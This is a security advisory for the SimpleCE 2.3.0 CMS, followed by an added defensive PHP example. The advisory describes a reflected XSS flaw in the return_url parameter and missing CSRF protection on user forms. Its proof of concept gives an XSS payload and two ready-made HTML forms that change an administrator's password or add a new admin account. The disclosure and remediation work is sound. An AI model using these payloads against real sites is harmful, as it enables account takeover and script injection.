SimpleCE 2.3.0 Cross Site Request Forgery / Cross Site Scripting

2017.06.15
Credit: 8bitsec
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: SimpleCE 2.3.0 - Multiple Vulnerabilities XSS CSRF
# Date: 2017-06-14
# Exploit Author: 8bitsec
# Vendor Homepage: http://simplece.com
# Software Link: https://codecanyon.net/item/simplece-v2-mini-cms/9140868
# Version: 2.3.0, probably older versions
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.5]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-06-14

Product & Service Introduction:
===============================
SimpleCE is a simple Content-Management System with a front-end editor mode.

Vulnerability Disclosure Timeline:
==================================
2017-06-13: Vulnerability found.
2017-06-13: Reported to vendor.
2017-06-14: No answer.
2017-06-14: Published.

Technical Details & Description:
================================
An authenticated reflected XSS vulnerability was found in the return_url parameter of
http://[server]/[path]/index.php/content/text/1?return_url=[XSS]
and is exploitable as a regular or admin user.

The user management forms carry no anti-CSRF token, so a CSRF attack can add a new administrator
or change an existing administrator's details, including the password.

Proof of Concept (PoC):
=======================
XSS:
http://[server]/[path]/index.php/content/text/1?return_url=<svg/onload=alert(/8bitsec/)>

CSRF:

Modify User:

<form action="http://[server]/[path]/index.php/user/1" autocomplete="off" method="post" accept-charset="utf-8">
  <label>Username<input type="text" name="username" id="username" placeholder="Username" value="admin" required="required" /></label>
  <label>Email<input type="email" name="email" id="email" placeholder="Email" value="mail@example.com" required="required" /></label>
  <label>Firstname<input type="text" name="firstname" id="firstname" placeholder="Firstname" value="John" /></label>
  <label>Surname<input type="text" name="surname" id="surname" placeholder="Surname" value="Doe" /></label>
  <label>Password<input type="password" name="password" id="password" placeholder="Password" /></label>
  <label>Password (repeat)<input type="password" name="password2" id="password2" placeholder="Password (repeat)" /></label>
  <button type="submit" name="save" id="save" value="save">save</button>
</form>

Add User:

<form action="http://[server]/[path]/index.php/user/new" autocomplete="off" method="post" accept-charset="utf-8">
  <label>Username<input type="text" name="username" id="username" placeholder="Username" value="adminuser" required="required" /></label>
  <label>Email<input type="email" name="email" id="email" placeholder="Email" value="a@b.com" required="required" /></label>
  <label>Firstname<input type="text" name="firstname" id="firstname" placeholder="Firstname" value="admin" /></label>
  <label>Surname<input type="text" name="surname" id="surname" placeholder="Surname" value="user" /></label>
  <label>Password<input type="password" name="password" id="password" placeholder="Password" required="required" /></label>
  <label>Password (repeat)<input type="password" name="password2" id="password2" placeholder="Password (repeat)" required="required" /></label>
  <label for="group">Role<select name="group" id="group" required="required">
    <option value="2">User</option>
    <option value="1" selected="selected">Admin</option>
  </select></label>
  <button type="submit" name="save" id="save" value="save">save</button>
</form>

Credits & Authors:
==================
8bitsec - [https://twitter.com/_8bitsec]
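Both findings above come down to two missing controls: a synchronizer token on the state-changing user forms, and validation plus output encoding of return_url before it is reflected. The PHP below is an added example written for this editorial copy; it is not SimpleCE's own code and nothing in the advisory shows how the application is structured. It assumes a PHP session is available, that the user controller reads the POST fields named in the PoC forms, and that some view echoes return_url into an HTML attribute. The function names (csrf_token, csrf_valid, csrf_field, safe_return_url, return_link) are this example's own.

```php
<?php
// Added example, not SimpleCE's code: the two controls that close the CSRF and
// reflected-XSS issues in this advisory, written as plain PHP a small CMS could adopt.
// Assumptions (not from the page): PHP sessions are in use, the user controller handles
// POSTs to user/1 and user/new, and a view writes return_url into an <a href>.

session_start();

// ---- CSRF: synchronizer token ------------------------------------------

// Per-session token, minted from the CSPRNG on first use.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only when the submitted token matches the session token.
// hash_equals() keeps the comparison constant-time.
function csrf_valid(array $post): bool {
    $sent = $post['csrf_token'] ?? '';
    return is_string($sent) && $sent !== ''
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $sent);
}

// Hidden field to place inside every state-changing form (user/1, user/new, ...).
// A cross-site page cannot read the victim's session token, so its forged POST
// arrives without a valid value and is rejected below.
function csrf_field(): string {
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// ---- return_url: validate first, encode on output ----------------------

// Accept only a local path: one leading slash, no scheme, no "//" or "\" prefix,
// and a conservative character set. Anything else falls back to a fixed default,
// so the <svg/onload=...> payload from the PoC never reaches the page.
function safe_return_url(?string $candidate, string $default = '/index.php'): string {
    if ($candidate === null) {
        return $default;
    }
    if (!preg_match('#^/(?![/\\\\])[A-Za-z0-9_\-./?=&%]*$#', $candidate)) {
        return $default;
    }
    return $candidate;
}

// Output encoding is the second layer: even a value that passed validation is
// HTML-encoded when it is written into an attribute.
function return_link(string $url): string {
    return '<a href="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '">Back</a>';
}

// ---- Where the checks sit in a user controller --------------------------

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_valid($_POST)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // ... only now apply the username / email / password / group changes ...
}

// The edit form itself must embed csrf_field() so legitimate submissions carry the token.
echo return_link(safe_return_url($_GET['return_url'] ?? null));
```

With this in place the PoC's user/1 and user/new requests fail the token check before any field is read, and the return_url payload is replaced by the default path (and would be attribute-encoded even if it were echoed). Setting the session cookie's SameSite attribute (session_set_cookie_params() accepts a samesite option from PHP 7.3) is a worthwhile additional layer, but it is not a substitute for the token, which also protects clients and setups where the cookie attribute is not honoured.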


Copyright 2018, cxsecurity.com